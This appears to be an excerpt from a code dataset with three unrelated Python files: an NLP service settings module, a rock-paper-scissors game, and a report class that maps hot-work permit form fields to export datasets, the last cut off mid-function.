{"seq_id":"139780386","text":"# (C) Copyright 2014 Voyager Search\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os\n\n\n\"\"\"Settings for the nlp service.\"\"\"\nSERVICE_ADDRESS = 'localhost'\nSERVICE_PORT = 8081\n\nbase_path = os.path.dirname(__file__)\n\"\"\" Change this path to the location you would like the logs to be written to. \"\"\"\nLOG_FILE_PATH = os.path.join(base_path, 'logs')\nif not os.path.exists(LOG_FILE_PATH):\n    os.makedirs(LOG_FILE_PATH)\n","sub_path":"pipeline/steps/voyager-nlp/nlp/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"491311897","text":"'''Rock paper scissors game :)'''\nfrom Computer import Computer;\nfrom Player import Player;\nfrom Decider import Decider;\n\n#Decides the winner\ndef main():\n    player = Player.decide();\n    computer = Computer.decide();\n    print('The computer chose ', computer, '. You chose ', player, sep = '');\n    decider = Decider(computerChoice = computer, playerChoice = player);\n    decider.decide();\n    \nprint('Welcome to Rock Paper Scissors!!');\nplayAgain = 'Y';\n\nwhile playAgain == 'Y':\n    main();\n    playAgain = input('Play again? 
Y/N\\n');","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"257324714","text":"from collections import OrderedDict\n\nfrom datetime_tz import datetime_tz\n\nfrom PTTGC.PermitToWork.DataSets.DataSetHelper import DataSetHelper\nfrom sjsoft.Apps.Reports import Export\n\n\nclass HotWorkDataSet(DataSetHelper):\n _PERMIT_HEADING_FIELDS_DATASET = 'permit_heading_fields'\n _PERMIT_DATETIME_FIELDS_DATASET = 'permit_datetime_fields'\n _PERMIT_SIGNATURE_AND_NAME_FIELDS_DATASET = 'permit_signature_and_name_fields'\n _OTHER_RELEVANT_DOCUMENTS_FIELDS_DATASET = 'other_relevant_documents_fields'\n _CERTIFICATE_FIELDS_DATASET = 'certificate_fields'\n _SAFETY_REQUIREMENTS_FIELDS_DATASET = 'safety_requirements_fields'\n _PERSONAL_PROTECTIVE_EQUIPMENT_REQUIRED_FIELDS_DATASET = 'personal_protective_equipment_required_fields'\n _GAS_MEASUREMENT_RESULTS_FIELDS_DATASET = 'gas_measurement_results_fields'\n _APPROVAL_NON_FLAMABLE_FIELDS_DATASET = 'approval_non_flamable_fields'\n _APPROVAL_FLAMABLE_FIELDS_DATASET = 'approval_flamable_fields'\n _COMMUNICATE_WITH_REQUESTOR_FIELDS_DATASET = 'communicate_with_requestor_fields'\n _GAS_DETECTION_FIELDS_DATASET = 'gas_detection_fields'\n _WORK_PERMIT_RENEWAL_FIELDS_DATASET = 'work_permit_renewal_fields'\n _CLOSE_WORK_PERMIT_FIELDS_DATASET = 'close_work_permit_fields'\n\n _SECTION_1_TITLE = 'Contractors fill the information data and attach document for Work Permit' # job owner\n _SECTION_2_TITLE = 'Job Owner verify data from contractor' # job owner\n _SECTION_3_TITLE = 'Cosigner approval for Work Permit' # cosign\n _SECTION_4_TITLE = 'Permit Issuer preparation area' # Permit Issuer\n _SECTION_5_TITLE = 'Permit Issuer preparation area' # Permit Issuer\n _SECTION_6_TITLE = 'Work Permit Approval (Non-Open Flammable)' # Approve\n _SECTION_7_TITLE = 'Work Permit Approval (Open Flammable)' # Approve\n _SECTION_8_TITLE = 'Communicate with Requestor (Non-Open Flammable)' # Permit Issuer\n _SECTION_9_TITLE = 'Communicate with Requestor (Open Flammable)' # Permit Issuer\n _SECTION_10_TITLE = 'Gas test while working' # Permit Issuer\n _SECTION_11_TITLE = 'Renewal of Perrmit Request' # job owner\n _SECTION_12_TITLE = 'Renewal of Perrmit (Non-Open Flammable)' # cosign\n _SECTION_13_TITLE = 'Renewal of Perrmit (Open Flammable)' # Permit Issuer\n _SECTION_14_TITLE = 'Close Permit (Non-Open Flammable)' # Permit Issuer\n _SECTION_15_TITLE = 'Close Permit (Open Flammable)' # job owner\n\n def create_metadata(self):\n # Heading Dataset fields\n permit_heading_fields = [\n Export.FieldMetaData('moc_no', None, 'str', 'Text211'),\n Export.FieldMetaData('permit_no', None, 'str', 'PermitNumber'),\n Export.FieldMetaData('applicant_name', None, 'str', 'HWRU_Name'),\n Export.FieldMetaData('contractor_company', None, 'str', 'Text2'),\n Export.FieldMetaData('phone_number', None, 'str', 'HWRU_Tel'),\n Export.FieldMetaData('number_of_operators', None, 'int', 'Integer1'),\n Export.FieldMetaData('restricted_area', None, 'str', 'area1'),\n Export.FieldMetaData('control_area', None, 'str', 'Choice61'),\n Export.FieldMetaData('workplace', None, 'str', 'Text220'),\n Export.FieldMetaData('device_name', None, 'str', 'Text3'),\n Export.FieldMetaData('device_number', None, 'str', 'Text4'),\n Export.FieldMetaData('description', None, 'str', 'Text225'),\n Export.FieldMetaData('area_hierarchy', None, 'str', 'Choice65'),\n Export.FieldMetaData('job_owner_name', None, 'str', 
'JON_Name'),\n ]\n\n # Datetime Dataset fields\n permit_datetime_fields = [\n Export.FieldMetaData('header_from_date', None, 'datetime', 'DateTimeStart'),\n Export.FieldMetaData('header_to_date', None, 'datetime', 'DateTimeEnd'),\n Export.FieldMetaData('header_job_owner_signed_date', None, 'datetime', 'Date3'),\n Export.FieldMetaData('gas_measurement_datetime', None, 'datetime', 'DateTime87'),\n Export.FieldMetaData('approval_non_flamable_datetime', None, 'datetime', 'DateTime88'),\n Export.FieldMetaData('approval_flamable_datetime', None, 'datetime', 'DateTime90'),\n Export.FieldMetaData('approval_cosign_datetime', None, 'datetime', 'DateTime91'),\n Export.FieldMetaData('requestor_non_flamable_datetime', None, 'datetime', 'DateTime101'),\n Export.FieldMetaData('requestor_flamable_datetime', None, 'datetime', 'DateTime102'),\n Export.FieldMetaData('gas_detection_reading1', None, 'datetime', 'DateTime79'),\n Export.FieldMetaData('gas_detection_reading2', None, 'datetime', 'DateTime100'),\n Export.FieldMetaData('gas_detection_reading3', None, 'datetime', 'DateTime100'),\n Export.FieldMetaData('wp_renew_non_flamable_datetime', None, 'datetime', 'DateTime35'),\n Export.FieldMetaData('wp_permit_non_flamable_approver_datetime', None, 'datetime', 'DateTime96'),\n Export.FieldMetaData('wp_renew_flamable_datetime', None, 'datetime', 'DateTime97'),\n Export.FieldMetaData('wp_permit_flamable_approver_datetime', None, 'datetime', 'DateTime98'),\n Export.FieldMetaData('close_restore_license_datetime_non_flamable', None, 'datetime', 'DateTime36'),\n Export.FieldMetaData('close_audit_accept_datetime_non_flamable', None, 'datetime', 'DateTime109'),\n Export.FieldMetaData('close_restore_license_datetime_flamable', None, 'datetime', 'DateTime94'),\n Export.FieldMetaData('close_audit_accept_datetime_flamable', None, 'datetime', 'DateTime108'),\n ]\n\n # # Datetime Dataset fields\n # permit_signature_and_name_fields = [\n # Export.FieldMetaData('approval_non_flamable_name_section_4_or_5', None, 'any', 'SubmitName_4_or_5'),\n # Export.FieldMetaData('approval_non_flamable_signature_section_4_or_5', None, 'any', 'SubmitSignature_4_or_5'),\n # Export.FieldMetaData('approval_non_flamable_name_section_6', None, 'any', 'SubmitName_6'),\n # Export.FieldMetaData('approval_non_flamable_signature_section_6', None, 'any', 'SubmitSignature_6'),\n # Export.FieldMetaData('wp_name_section_11_or_12', None, 'any', 'SubmitName_11_or_12'),\n # Export.FieldMetaData('wp_signature_section_11_or_12', None, 'any', 'SubmitSignature_11_or_12'),\n # ]\n\n permit_signature_and_name_fields = [\n Export.FieldMetaData('contractor_submit_name', None, 'str', 'section1_user'),\n Export.FieldMetaData('contractor_submit_datetime', None, 'datetime', 'section1_datetime'),\n Export.FieldMetaData('job_owner_submit_name', None, 'str', 'section2_user'),\n Export.FieldMetaData('job_owner_submit_datetime', None, 'datetime', 'section2_datetime'),\n Export.FieldMetaData('cosign_submit_name', None, 'str', 'section3_user'),\n Export.FieldMetaData('cosign_submit_datetime', None, 'datetime', 'section3_datetime'),\n Export.FieldMetaData('permit_issuer_verify_name', None, 'str', 'section4_user'),\n Export.FieldMetaData('permit_issuer_verify_datetime', None, 'datetime', 'section4_datetime'),\n Export.FieldMetaData('permit_issuer_submit_name', None, 'str', 'section5_user'),\n Export.FieldMetaData('permit_issuer_submit_datetime', None, 'datetime', 'section5_datetime'),\n\n Export.FieldMetaData('permit_approve_submit_name_non', None, 'str', 'section6_user'),\n 
Export.FieldMetaData('permit_approve_submit_datetime_non', None, 'datetime', 'section6_datetime'),\n Export.FieldMetaData('permit_approve_submit_name_open', None, 'str', 'section7_user'),\n Export.FieldMetaData('permit_approve_submit_datetime_open', None, 'datetime', 'section7_datetime'),\n\n Export.FieldMetaData('communicate_requestor_name_non', None, 'str', 'section8_user'),\n Export.FieldMetaData('communicate_requestor_datetime_non', None, 'datetime', 'section8_datetime'),\n Export.FieldMetaData('communicate_requestor_name_open', None, 'str', 'section9_user'),\n Export.FieldMetaData('communicate_requestor_datetime_open', None, 'datetime', 'section9_datetime'),\n\n Export.FieldMetaData('renewal_permit_request_name_non', None, 'str', 'section11_user'),\n Export.FieldMetaData('renewal_permit_request_non', None, 'datetime', 'section11_datetime'),\n Export.FieldMetaData('renewal_permit_request_name_open', None, 'str', 'section11_user'),\n Export.FieldMetaData('renewal_permit_request_open', None, 'datetime', 'section11_datetime'),\n\n Export.FieldMetaData('renewal_permit_submit_name_non', None, 'str', 'section12_user'),\n Export.FieldMetaData('renewal_permit_submit_datetime_non', None, 'datetime', 'section12_datetime'),\n Export.FieldMetaData('renewal_permit_submit_name_open', None, 'str', 'section13_user'),\n Export.FieldMetaData('renewal_permit_submit_datetime_open', None, 'datetime', 'section13_datetime'),\n\n Export.FieldMetaData('Close_Permit_submit_name_non', None, 'str', 'section14_user'),\n Export.FieldMetaData('Close_Permit_submit_datetime_non', None, 'datetime', 'section14_datetime'),\n Export.FieldMetaData('Close_Permit_submit_name_open', None, 'str', 'section15_user'),\n Export.FieldMetaData('Close_Permit_submit_datetime_open', None, 'datetime', 'section15_datetime')\n ]\n\n\n\n\n\n\n\n\n\n\n\n\n\n # Certificate Dataset fields\n certificate_fields = [\n Export.FieldMetaData('confined_space_certificate_no', None, 'str', 'confined_space_certificate_no'),\n Export.FieldMetaData('crane_lifting_certificate_no', None, 'str', 'crane_lifting_certificate_no'),\n Export.FieldMetaData('excavation_certificate_no', None, 'str', 'excavation_certificate_no'),\n Export.FieldMetaData('box_up_certificate_no', None, 'str', 'box_up_certificate_no'),\n Export.FieldMetaData('radiography_certificate_no', None, 'str', 'radiography_certificate_no'),\n Export.FieldMetaData('diving_certificate_no', None, 'str', 'diving_certificate_no'),\n Export.FieldMetaData('scaffolding_certificate_no', None, 'str', 'scaffolding_certificate_no'),\n Export.FieldMetaData('road_close_certificate_no', None, 'str', 'road_close_certificate_no'),\n Export.FieldMetaData('nearby_high_voltage_certificate_no', None, 'str', 'nearby_high_voltage_certificate_no')\n ]\n\n # other_relevant_documents Dataset fields\n other_relevant_documents_fields = [\n Export.FieldMetaData('jsea_safety_environment', None, 'str', 'Text230'),\n Export.FieldMetaData('p_id_route_attachment', None, 'str', 'Text221'),\n Export.FieldMetaData('p_id_route', None, 'str', 'Text221'),\n Export.FieldMetaData('safety_datasheet', None, 'str', 'Text16'),\n Export.FieldMetaData('safety_datasheet_attachment', None, 'str', 'Text16'),\n Export.FieldMetaData('other_title', None, 'str', 'Text236'),\n Export.FieldMetaData('job_description', None, 'str', 'Choice62'),\n Export.FieldMetaData('job_owner_integer41', None, 'int', 'Integer41'),\n Export.FieldMetaData('surname', None, 'str', 'Text204')\n ]\n\n # safety_requirements Dataset fields\n safety_requirements_fields = [\n 
Export.FieldMetaData('last_used_device_condition', None, 'str', 'Text22'),\n Export.FieldMetaData('device_paused_checklist', None, 'str', 'ChecklistItem125'),\n Export.FieldMetaData('device_cut_off_check', None, 'str', 'Checkbox17'),\n Export.FieldMetaData('device_cut_off_text', None, 'str', 'Text23'),\n Export.FieldMetaData('is_pressure_our_checklist', None, 'str', 'ChecklistItem126'),\n Export.FieldMetaData('attach_logic_control_diagram', None, 'str', 'Text24'),\n Export.FieldMetaData('liquid_is_released_checklist', None, 'str', 'ChecklistItem127'),\n Export.FieldMetaData('isolation_plan_check', None, 'str', 'Checkbox18'),\n Export.FieldMetaData('not_attached_logic_control_diagram', None, 'str', 'Text25'),\n Export.FieldMetaData('liquid_residues_checklistitem', None, 'str', 'ChecklistItem128'),\n Export.FieldMetaData('pressure_drop_checklistitem', None, 'str', 'ChecklistItem129'),\n Export.FieldMetaData('local_switch_check', None, 'str', 'Checkbox19'),\n Export.FieldMetaData('by_pass', None, 'str', 'Text26'),\n Export.FieldMetaData('pipe_has_been_cut_checklistitem', None, 'str', 'ChecklistItem130'),\n Export.FieldMetaData('breaker_check', None, 'str', 'Checkbox20'),\n Export.FieldMetaData('breaker', None, 'str', 'Text27'),\n Export.FieldMetaData('equipment_cleaned_checklistitem', None, 'str', 'ChecklistItem131'),\n Export.FieldMetaData('other_breaker', None, 'str', 'Text191'),\n Export.FieldMetaData('remove_pipe_joints_checklistitem', None, 'str', 'ChecklistItem132'),\n Export.FieldMetaData('cleaning_with_nitrogen_checklistitem', None, 'str', 'ChecklistItem133'),\n Export.FieldMetaData('attach_electric_plan_check', None, 'str', 'Checkbox21'),\n Export.FieldMetaData('steam_cleaning_checklistitem', None, 'str', 'ChecklistItem134'),\n Export.FieldMetaData('no_electricity_plan_check', None, 'str', 'Checkbox22'),\n Export.FieldMetaData('cleaning_the_water_checklistitem', None, 'str', 'ChecklistItem135'),\n Export.FieldMetaData('electrical_equipment_cut_checklistitem', None, 'str', 'ChecklistItem136'),\n Export.FieldMetaData('defeat_check', None, 'str', 'Checkbox23'),\n Export.FieldMetaData('defeat', None, 'str', 'Text30'),\n Export.FieldMetaData('other_defeat_checklistitem', None, 'str', 'ChecklistItem137'),\n Export.FieldMetaData('by_pass_check', None, 'str', 'Checkbox26'),\n Export.FieldMetaData('sparking_block_fireproof_cover', None, 'str', 'Text31'),\n Export.FieldMetaData('by_pass_description', None, 'str', 'Text192'),\n Export.FieldMetaData('attach_logic_control_diagram_check', None, 'str', 'Checkbox24'),\n Export.FieldMetaData('make_on_site_verifier_checklistitem', None, 'str', 'ChecklistItem138'),\n Export.FieldMetaData('not_attach_logic_control_diagram_check', None, 'str', 'Checkbox25'),\n Export.FieldMetaData('contact_on_site_verifier', None, 'str', 'Text222'),\n Export.FieldMetaData('recommended_actions', None, 'str', 'Text194'),\n Export.FieldMetaData('block_work_area_check', None, 'str', 'Checkbox27'),\n Export.FieldMetaData('personal_gas_meter_check', None, 'str', 'Checkbox36'),\n Export.FieldMetaData('personal_gas_meter', None, 'str', 'Text33'),\n Export.FieldMetaData('cover_drain_in_radius_check', None, 'str', 'Checkbox28'),\n Export.FieldMetaData('connect_spray_line_check', None, 'str', 'Checkbox37'),\n Export.FieldMetaData('prepare_ventilator_check', None, 'str', 'Checkbox29'),\n Export.FieldMetaData('warning_signs_check', None, 'str', 'Checkbox38'),\n Export.FieldMetaData('water_spray_baffle_check', None, 'str', 'Checkbox30'),\n 
Export.FieldMetaData('leaky_hydrocarbon_stop_working_check', None, 'str', 'Checkbox39'),\n Export.FieldMetaData('sparking_block_fireproof_cover_check', None, 'str', 'Checkbox31'),\n Export.FieldMetaData('do_not_release_liquid_check', None, 'str', 'Checkbox40'),\n Export.FieldMetaData('fire_extinguishers_in_work_area_check', None, 'str', 'Checkbox32'),\n Export.FieldMetaData('communicate_with_staff_check', None, 'str', 'Checkbox41'),\n Export.FieldMetaData('standby_fire_extinguisher_check', None, 'str', 'Checkbox33'),\n Export.FieldMetaData('destroy_pyrophoric_substances_check', None, 'str', 'Checkbox42'),\n Export.FieldMetaData('eye_washer_availability_check', None, 'str', 'Checkbox34'),\n Export.FieldMetaData('be_careful_side_effects_check', None, 'str', 'Checkbox43'),\n Export.FieldMetaData('drill_pipe_gas_detection_check', None, 'str', 'Checkbox35'),\n Export.FieldMetaData('other_safety_requirements_check', None, 'str', 'Checkbox44'),\n Export.FieldMetaData('other_safety_requirements', None, 'str', 'Text34'),\n Export.FieldMetaData('more_caution', None, 'str', 'Text196'),\n Export.FieldMetaData('text243', None, 'str', 'Text211')#text243\n ]\n\n # personal_protective_equipment_required Dataset fields\n personal_protective_equipment_required_fields = [\n Export.FieldMetaData('standard_ppe_check', None, 'str', 'Checkbox50'),\n Export.FieldMetaData('safety_glasses_check', None, 'str', 'Checkbox54'),\n Export.FieldMetaData('chemical_mask_check', None, 'str', 'Checkbox51'),\n Export.FieldMetaData('full_body_harness_check', None, 'str', 'Checkbox55'),\n Export.FieldMetaData('ear_plugs_check', None, 'str', 'Checkbox52'),\n Export.FieldMetaData('dust_prevention_kit_check', None, 'str', 'Checkbox56'),\n Export.FieldMetaData('glove_check', None, 'str', 'Checkbox53'),\n Export.FieldMetaData('chemical_protection_suit_check', None, 'str', 'Checkbox57'),\n Export.FieldMetaData('other_ppe_check', None, 'str', 'Checkbox58'),\n Export.FieldMetaData('other_ppe', None, 'str', 'Text41')\n ]\n\n # gas_measurement_results Dataset fields\n gas_measurement_results_fields = [\n Export.FieldMetaData('agt_choice', None, 'str', 'Choice57'),\n Export.FieldMetaData('lel_frequency', None, 'float', 'Number184'),\n Export.FieldMetaData('o2_frequency', None, 'float', 'Number185'),\n Export.FieldMetaData('h2o_frequency', None, 'float', 'Number186'),\n Export.FieldMetaData('co_frequency', None, 'float', 'Number187'),\n Export.FieldMetaData('other_frequency', None, 'float', 'Number188'),\n Export.FieldMetaData('lel_standard', None, 'float', 'Integer19'),\n Export.FieldMetaData('o2_standard', None, 'float', 'Integer20'),\n Export.FieldMetaData('h2o_standard', None, 'float', 'Integer21'),\n Export.FieldMetaData('co_standard', None, 'float', 'Integer22'),\n Export.FieldMetaData('other_standard', None, 'float', 'Integer23'),\n Export.FieldMetaData('gas_measurement_other', None, 'str', 'Text215'),\n Export.FieldMetaData('gas_measurement_na', None, 'str', 'Text203')\n ]\n\n # approval_non_flamable Dataset fields\n approval_non_flamable_fields = [\n Export.FieldMetaData('non_flamable_employee_number', None, 'int', 'Integer45'),\n Export.FieldMetaData('non_flamable_surname', None, 'str', 'Text209'),\n Export.FieldMetaData('non_flamable_validated_check', None, 'str', 'Checkbox65')\n ]\n\n # approval_flamable Dataset fields\n approval_flamable_fields = [\n Export.FieldMetaData('flamable_employee_number', None, 'int', 'Integer46'),\n Export.FieldMetaData('flamable_employee_surname', None, 'str', 'Text210'),\n 
Export.FieldMetaData('flamable_validated_check', None, 'str', 'Checkbox67'),\n Export.FieldMetaData('permit_requires_co_sign_checklistitem', None, 'str', 'ChecklistItem143'),\n Export.FieldMetaData('employee_coordinator_code', None, 'int', 'Integer42'),\n Export.FieldMetaData('employee_coordinator_surname', None, 'str', 'Text206'),\n Export.FieldMetaData('cosign_validated', None, 'str', 'Checkbox68')\n ]\n\n # communicate_with_requestor Dataset fields\n communicate_with_requestor_fields = [\n Export.FieldMetaData('requestor_non_flamable_check', None, 'str', 'Checkbox66'),\n Export.FieldMetaData('requesto_flamable_check', None, 'str', 'Checkbox69'),\n Export.FieldMetaData('requestor_supervisor_non_flamable', None, 'str', 'Text228'),\n Export.FieldMetaData('requestor_supervisor_flamable', None, 'str', 'Text238'),\n Export.FieldMetaData('requestor_verifier_non_flamable', None, 'str', 'Label748'),\n Export.FieldMetaData('requestor_verifier_flamable', None, 'str', 'Label768')\n ]\n\n # gas_detection Dataset fields\n gas_detection_fields = [\n Export.FieldMetaData('lel_reading1', None, 'float', 'Integer2'),\n Export.FieldMetaData('o2_reading1', None, 'float', 'Integer7'),\n Export.FieldMetaData('h2o_reading1', None, 'float', 'Integer17'),\n Export.FieldMetaData('co_reading1', None, 'float', 'Integer18'),\n Export.FieldMetaData('other_reading1', None, 'float', 'Integer28'),\n Export.FieldMetaData('agt_reading1', None, 'str', 'Text216'),\n Export.FieldMetaData('lel_reading2', None, 'float', 'Integer24'),\n Export.FieldMetaData('o2_reading2', None, 'float', 'Integer25'),\n Export.FieldMetaData('h2o_reading2', None, 'float', 'Integer26'),\n Export.FieldMetaData('co_reading2', None, 'float', 'Integer27'),\n Export.FieldMetaData('other_reading2', None, 'float', 'Integer29'),\n Export.FieldMetaData('agt_reading2', None, 'str', 'Text223'),\n Export.FieldMetaData('lel_reading3', None, 'float', 'Integer30'),\n Export.FieldMetaData('o2_reading3', None, 'float', 'Integer31'),\n Export.FieldMetaData('h2o_reading3', None, 'float', 'Integer32'),\n Export.FieldMetaData('co_reading3', None, 'float', 'Integer33'),\n Export.FieldMetaData('other_reading3', None, 'float', 'Integer34'),\n Export.FieldMetaData('agt_reading3', None, 'str', 'Text224')\n ]\n\n # work_permit_renewal Dataset fields\n work_permit_renewal_fields = [\n Export.FieldMetaData('renew_license', None, 'str', 'ChecklistItem140'),\n Export.FieldMetaData('renew_non_flamable_employee_number', None, 'int', 'Integer43'),\n Export.FieldMetaData('renew_non_flamable_surname', None, 'str', 'Text207'),\n Export.FieldMetaData('permit_non_flamable_approver_check', None, 'str', 'Checkbox74'),\n Export.FieldMetaData('renew_flamable_employee_number', None, 'int', 'Integer44'),\n Export.FieldMetaData('renew_flamable_surname', None, 'str', 'Text208'),\n Export.FieldMetaData('permit_flamable_approver_check', None, 'str', 'Checkbox75'),\n Export.FieldMetaData('supervisor_acknowledged_non_flamable', None, 'str', 'Text259'),\n Export.FieldMetaData('supervisor_acknowledged_flamable', None, 'str', 'Text241')\n ]\n\n # close_work_permit Dataset fields\n close_work_permit_fields = [\n Export.FieldMetaData('lock_removed_non_flamable_checklistitem', None, 'str', 'ChecklistItem141'),\n Export.FieldMetaData('lock_removed_not_reason_non_flamable', None, 'str', 'Text197'),\n Export.FieldMetaData('license_closing_non_flamable_check', None, 'str', 'Checkbox60'),\n Export.FieldMetaData('work_complete_non_flamable_check', None, 'str', 'Checkbox61'),\n 
Export.FieldMetaData('unfinished_work_reason_non_flamable', None, 'str', 'Text54'),\n Export.FieldMetaData('restore_license_supervisor_non_flamable', None, 'str', 'Text56'),\n Export.FieldMetaData('audit_accept_non_flamable_check', None, 'str', 'Checkbox62'),\n Export.FieldMetaData('audit_accept_no_reason_non_flamable_check', None, 'str', 'Checkbox63'),\n Export.FieldMetaData('audit_accept_no_reason_non_flamable', None, 'str', 'Text55'),\n Export.FieldMetaData('lock_removed_flamable_checklistitem', None, 'str', 'ChecklistItem142'),\n Export.FieldMetaData('lock_removed_not_reason_flamable', None, 'str', 'Text198'),\n Export.FieldMetaData('license_closing_flamable_check', None, 'str', 'Checkbox70'),\n Export.FieldMetaData('work_complete_flamable_check', None, 'str', 'Checkbox71'),\n Export.FieldMetaData('unfinished_work_reason_flamable', None, 'str', 'Text199'),\n Export.FieldMetaData('restore_license_supervisor_flamable', None, 'str', 'Text200'),\n Export.FieldMetaData('audit_accept_flamable_check', None, 'str', 'Checkbox76'),\n Export.FieldMetaData('audit_accept_no_reason_flamable_check', None, 'str', 'Checkbox77'),\n Export.FieldMetaData('audit_accept_no_reason_flamable', None, 'str', 'Text202'),\n Export.FieldMetaData('permit_issuer_non_flamable', None, 'str', 'Text258'),\n Export.FieldMetaData('permit_issuer_flamable', None, 'str', 'Text257')\n ]\n\n metadata = [Export.DataSetMetaData('permit_heading_fields.csv', self._PERMIT_HEADING_FIELDS_DATASET, permit_heading_fields)]\n metadata.extend([Export.DataSetMetaData('permit_datetime_fields.csv', self._PERMIT_DATETIME_FIELDS_DATASET, permit_datetime_fields)])\n metadata.extend([Export.DataSetMetaData('permit_signature_and_name_fields.csv', self._PERMIT_SIGNATURE_AND_NAME_FIELDS_DATASET, permit_signature_and_name_fields)])\n metadata.extend([Export.DataSetMetaData('certificate_fields.csv', self._CERTIFICATE_FIELDS_DATASET, certificate_fields)])\n metadata.extend([Export.DataSetMetaData('other_relevant_documents_fields.csv', self._OTHER_RELEVANT_DOCUMENTS_FIELDS_DATASET, other_relevant_documents_fields)])\n metadata.extend([Export.DataSetMetaData('safety_requirements_fields.csv',self._SAFETY_REQUIREMENTS_FIELDS_DATASET, safety_requirements_fields)])\n metadata.extend([Export.DataSetMetaData('personal_protective_equipment_required_fields.csv',self._PERSONAL_PROTECTIVE_EQUIPMENT_REQUIRED_FIELDS_DATASET, personal_protective_equipment_required_fields)])\n metadata.extend([Export.DataSetMetaData('gas_measurement_results_fields.csv', self._GAS_MEASUREMENT_RESULTS_FIELDS_DATASET, gas_measurement_results_fields)])\n metadata.extend([Export.DataSetMetaData('approval_non_flamable_fields.csv', self._APPROVAL_NON_FLAMABLE_FIELDS_DATASET, approval_non_flamable_fields)])\n metadata.extend([Export.DataSetMetaData('approval_flamable_fields.csv', self._APPROVAL_FLAMABLE_FIELDS_DATASET, approval_flamable_fields)])\n metadata.extend([Export.DataSetMetaData('communicate_with_requestor_fields.csv', self._COMMUNICATE_WITH_REQUESTOR_FIELDS_DATASET, communicate_with_requestor_fields)])\n metadata.extend([Export.DataSetMetaData('gas_detection_fields.csv', self._GAS_DETECTION_FIELDS_DATASET, gas_detection_fields)])\n metadata.extend([Export.DataSetMetaData('work_permit_renewal_fields.csv', self._WORK_PERMIT_RENEWAL_FIELDS_DATASET, work_permit_renewal_fields)])\n metadata.extend([Export.DataSetMetaData('close_work_permit_fields.csv', self._CLOSE_WORK_PERMIT_FIELDS_DATASET, close_work_permit_fields)])\n\n return metadata\n\n def generate_datasets(self, sa_session, 
params, locale, timezone):\n datasets = {}\n permit_logid = params.get('permit_logid')\n if permit_logid:\n snapshot = self.get_form_snapshot(sa_session, permit_logid)\n # permit_heading\n datasets[self._PERMIT_HEADING_FIELDS_DATASET] = self.get_permit_heading_fields_dataset(permit_logid, snapshot, self._PERMIT_HEADING_FIELDS_DATASET, sa_session)\n # permit_datetimes\n datasets[self._PERMIT_DATETIME_FIELDS_DATASET] = self.get_permit_datetime_fields_dataset(permit_logid, snapshot, self._PERMIT_DATETIME_FIELDS_DATASET, sa_session)\n # permit_signatures and names\n datasets[self._PERMIT_SIGNATURE_AND_NAME_FIELDS_DATASET] = self.get_permit_signature_and_name_fields_dataset(permit_logid, snapshot, self._PERMIT_SIGNATURE_AND_NAME_FIELDS_DATASET, sa_session)\n # certificate_fields\n datasets[self._CERTIFICATE_FIELDS_DATASET] = self.get_certificate_fields_dataset(permit_logid, snapshot, self._CERTIFICATE_FIELDS_DATASET, sa_session)\n # other_relevant_documents\n datasets[self._OTHER_RELEVANT_DOCUMENTS_FIELDS_DATASET] = self.get_other_relevant_documents_fields_dataset(permit_logid, snapshot, self._OTHER_RELEVANT_DOCUMENTS_FIELDS_DATASET, sa_session)\n # safety_requirements\n datasets[self._SAFETY_REQUIREMENTS_FIELDS_DATASET] = self.get_safety_requirements_fields_dataset(permit_logid, snapshot, self._SAFETY_REQUIREMENTS_FIELDS_DATASET, sa_session)\n # personal_protective_equipment_required\n datasets[self._PERSONAL_PROTECTIVE_EQUIPMENT_REQUIRED_FIELDS_DATASET] = self.get_personal_protective_equipment_required_fields_dataset(permit_logid, snapshot, self._PERSONAL_PROTECTIVE_EQUIPMENT_REQUIRED_FIELDS_DATASET, sa_session)\n # gas_measurement_results\n datasets[self._GAS_MEASUREMENT_RESULTS_FIELDS_DATASET] = self.get_gas_measurement_results_fields_dataset(permit_logid, snapshot, self._GAS_MEASUREMENT_RESULTS_FIELDS_DATASET, sa_session)\n # approval_non_flamable\n datasets[self._APPROVAL_NON_FLAMABLE_FIELDS_DATASET] = self.get_approval_non_flamable_fields_dataset(permit_logid, snapshot, self._APPROVAL_NON_FLAMABLE_FIELDS_DATASET, sa_session)\n # approval_flamable\n datasets[self._APPROVAL_FLAMABLE_FIELDS_DATASET] = self.get_approval_flamable_fields_dataset(permit_logid, snapshot, self._APPROVAL_FLAMABLE_FIELDS_DATASET, sa_session)\n # communicate_with_requestor\n datasets[self._COMMUNICATE_WITH_REQUESTOR_FIELDS_DATASET] = self.get_communicate_with_requestor_fields_dataset(permit_logid, snapshot, self._COMMUNICATE_WITH_REQUESTOR_FIELDS_DATASET, sa_session)\n # gas_detection\n datasets[self._GAS_DETECTION_FIELDS_DATASET] = self.get_gas_detection_fields_dataset(permit_logid, snapshot, self._GAS_DETECTION_FIELDS_DATASET, sa_session)\n # work_permit_renewal\n datasets[self._WORK_PERMIT_RENEWAL_FIELDS_DATASET] = self.get_work_permit_renewal_fields_dataset(permit_logid, snapshot, self._WORK_PERMIT_RENEWAL_FIELDS_DATASET, sa_session)\n # close_work_permit\n datasets[self._CLOSE_WORK_PERMIT_FIELDS_DATASET] = self.get_close_work_permit_fields_dataset(permit_logid, snapshot, self._CLOSE_WORK_PERMIT_FIELDS_DATASET, sa_session)\n return datasets\n\n def get_special_field_value(self, permit_logid, field_name, display_name, value, dataset, industraform_values, snapshot, sa_session):\n value = super(HotWorkDataSet, self).get_special_field_value(permit_logid, field_name, display_name, value, dataset, industraform_values, snapshot, sa_session)\n if field_name == 'area_hierarchy':\n value = self.get_area_hierarchy_value(value)\n return value\n\n @staticmethod\n def get_area_hierarchy_value(area_list_str):\n if not 
